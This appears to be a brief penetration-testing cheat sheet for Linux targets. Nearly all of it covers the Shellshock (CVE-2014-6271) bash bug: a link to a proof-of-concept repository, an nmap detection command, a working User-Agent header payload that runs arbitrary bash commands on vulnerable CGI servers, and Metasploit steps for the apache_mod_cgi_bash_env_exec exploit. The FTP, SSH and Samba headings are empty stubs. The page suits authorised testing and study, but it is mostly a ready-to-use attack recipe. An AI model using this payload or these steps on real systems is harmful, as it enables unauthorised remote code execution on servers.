Linux
Shellshock vulnerability
PoC
https://github.com/opsxcq/exploit-CVE-2014-6271
nmap scan
nmap $IP --script=http-shellshock --script-args "http-shellshock.url=/path/file.cgi
exploitation
User Agent: () { :; }; echo; echo; /bin/bash -c 'type your cmd here'
metasploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec
#options:
set RHOSTS $IP
set TARGETURL /path/to/file.cgi
exploit
FTP
for FTP you can refer to:
SSH
refer this page for ssh:
Samba
for samba refer:
Last updated